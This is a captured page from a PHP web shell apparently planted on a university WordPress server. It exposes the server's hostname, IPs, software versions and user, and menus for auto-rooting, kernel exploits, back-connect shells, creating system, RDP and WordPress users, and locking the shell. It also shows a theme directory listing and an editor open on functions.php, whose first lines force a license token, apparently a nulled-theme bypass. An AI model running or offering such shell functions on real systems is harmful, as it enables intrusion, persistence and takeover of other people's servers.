Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.118.144.50
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
appadmin /
cesa2025 /
wp-content /
themes /
jannah /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxr-x
buddypress
[ DIR ]
drwxrwxr-x
demos
[ DIR ]
drwxrwxr-x
framework
[ DIR ]
drwxrwxr-x
inc
[ DIR ]
drwxrwxr-x
languages
[ DIR ]
drwxrwxr-x
plugins
[ DIR ]
drwxrwxr-x
templates
[ DIR ]
drwxrwxr-x
404.php
1.41
KB
-rw-rw-r--
archive-web-story.php
1.11
KB
-rw-rw-r--
archive.php
1.38
KB
-rw-rw-r--
author.php
1.42
KB
-rw-rw-r--
buddypress.php
816
B
-rw-rw-r--
category.php
3.89
KB
-rw-rw-r--
comments.php
1.52
KB
-rw-rw-r--
footer.php
404
B
-rw-rw-r--
functions.php
4.5
KB
-rw-rw-r--
header.php
681
B
-rw-rw-r--
index.php
1.05
KB
-rw-rw-r--
page.php
590
B
-rw-rw-r--
rtl.css
39.93
KB
-rw-rw-r--
screenshot.jpg
60.18
KB
-rw-rw-r--
search.php
1.45
KB
-rw-rw-r--
sidebar-footer.php
2.85
KB
-rw-rw-r--
sidebar-shop.php
751
B
-rw-rw-r--
sidebar-slide.php
4.07
KB
-rw-rw-r--
sidebar.php
2.42
KB
-rw-rw-r--
single.php
359
B
-rw-rw-r--
style.css
704
B
-rw-rw-r--
tag.php
1.42
KB
-rw-rw-r--
template-authors.php
230
B
-rw-rw-r--
template-masonry.php
377
B
-rw-rw-r--
template-sitemap.php
227
B
-rw-rw-r--
wpml-config.xml
7.11
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions.php
<?php /** * Theme functions and definitions * */ $token = '***********************************'; update_option( 'tie_token_19659555', $token ); update_option( 'tie_jannah_custom_code', $token ); delete_option( 'tie_token_error_19659555' ); defined( 'ABSPATH' ) || exit; // Exit if accessed directly /* * Works with PHP 5.3 or Later */ if ( version_compare( phpversion(), '5.3', '<' ) ) { require get_template_directory() . '/framework/functions/php-disable.php'; return; } /* * Define Constants */ define( 'TIELABS_THEME_SLUG', 'jannah' ); define( 'TIELABS_TEXTDOMAIN', 'jannah' ); define( 'TIELABS_DB_VERSION', '7.2.0' ); // Don't change this define( 'TIELABS_THEME_ID', '19659555' ); // Don't change this define( 'TIELABS_TEMPLATE_PATH', get_template_directory() ); define( 'TIELABS_TEMPLATE_URL', get_template_directory_uri() ); define( 'TIELABS_AMP_IS_ACTIVE', function_exists( 'amp_init' ) ); define( 'TIELABS_WPUC_IS_ACTIVE', function_exists( 'run_MABEL_WPUC' ) ); define( 'TIELABS_ARQAM_IS_ACTIVE', function_exists( 'arqam_init' ) ); define( 'TIELABS_SENSEI_IS_ACTIVE', function_exists( 'Sensei' ) ); define( 'TIELABS_TAQYEEM_IS_ACTIVE', function_exists( 'taqyeem_get_option' ) ); define( 'TIELABS_EXTENSIONS_IS_ACTIVE', function_exists( 'jannah_extensions_shortcodes_scripts' ) ); define( 'TIELABS_INSTAGRAM_FEED_IS_ACTIVE', function_exists( 'tielabs_instagram_feed' ) ); define( 'TIELABS_BBPRESS_IS_ACTIVE', class_exists( 'bbPress' ) ); define( 'TIELABS_JETPACK_IS_ACTIVE', class_exists( 'Jetpack' ) ); define( 'TIELABS_BWPMINIFY_IS_ACTIVE', class_exists( 'BWP_MINIFY' ) ); define( 'TIELABS_REVSLIDER_IS_ACTIVE', class_exists( 'RevSlider' ) ); define( 'TIELABS_CRYPTOALL_IS_ACTIVE', class_exists( 'CPCommon' ) ); define( 'TIELABS_BUDDYPRESS_IS_ACTIVE', class_exists( 'BuddyPress' ) ); define( 'TIELABS_LS_Sliders_IS_ACTIVE', class_exists( 'LS_Sliders' ) ); define( 'TIELABS_FB_INSTANT_IS_ACTIVE', class_exists( 'Instant_Articles_Wizard' ) ); define( 'TIELABS_WOOCOMMERCE_IS_ACTIVE', class_exists( 'WooCommerce' ) ); define( 'TIELABS_MPTIMETABLE_IS_ACTIVE', class_exists( 'Mp_Time_Table' ) ); define( 'TIELABS_EVERESTFORMS_IS_ACTIVE', class_exists( 'EverestForms' ) ); define( 'TIELABS_WEBSTORIES_IS_ACTIVE', class_exists( '\Google\Web_Stories\Story_Query' ) ); /* * Theme Settings Option Field */ add_filter( 'TieLabs/theme_options', 'jannah_theme_options_name' ); function jannah_theme_options_name( $option ){ return 'tie_jannah_options'; } /* * Translatable Theme Name */ add_filter( 'TieLabs/theme_name', 'jannah_theme_name' ); function jannah_theme_name( $option ){ return tie_get_option( 'white_label_theme_name', esc_html__( 'Jannah News', TIELABS_TEXTDOMAIN ) ); } /** * Default Theme Color */ add_filter( 'TieLabs/default_theme_color', 'jannah_theme_color' ); function jannah_theme_color(){ return '#0088ff'; } /* * Import Files */ require TIELABS_TEMPLATE_PATH . '/framework/framework-load.php'; require TIELABS_TEMPLATE_PATH . '/inc/theme-setup.php'; require TIELABS_TEMPLATE_PATH . '/inc/custom-styles.php'; //require TIELABS_TEMPLATE_PATH . '/inc/inline-styles/inline-styles.php'; require TIELABS_TEMPLATE_PATH . '/inc/deprecated.php'; require TIELABS_TEMPLATE_PATH . '/inc/widgets.php'; require TIELABS_TEMPLATE_PATH . '/inc/fa4-to-fa5.php'; require TIELABS_TEMPLATE_PATH . '/inc/updates.php'; if( is_admin() ){ require TIELABS_TEMPLATE_PATH . '/inc/help-links.php'; } /** * Load the Sliders.js file in the Post Slideshow shortcode */ if( ! function_exists( 'jannah_enqueue_js_slideshow_sc' ) ){ add_action( 'tie_extensions_sc_before_post_slideshow', 'jannah_enqueue_js_slideshow_sc' ); function jannah_enqueue_js_slideshow_sc(){ wp_enqueue_script( 'tie-js-sliders' ); } } /* * Set the content width in pixels, based on the theme's design and stylesheet. */ add_action( 'wp_body_open', 'jannah_content_width' ); add_action( 'template_redirect', 'jannah_content_width' ); function jannah_content_width() { $content_width = TIELABS_HELPER::has_sidebar() ? 780 : 1220; /** * Filter content width of the theme. */ $GLOBALS['content_width'] = apply_filters( 'TieLabs/content_width', $content_width ); } /** */ add_action( 'the_content', 'jannah_post_content_width' ); function jannah_post_content_width( $content ) { if( TIELABS_HELPER::has_sidebar() && tie_get_option( 'boxes_style' ) == 2 ){ $GLOBALS['content_width'] = apply_filters( 'TieLabs/post_content_width', 708 ); } return $content; }
Close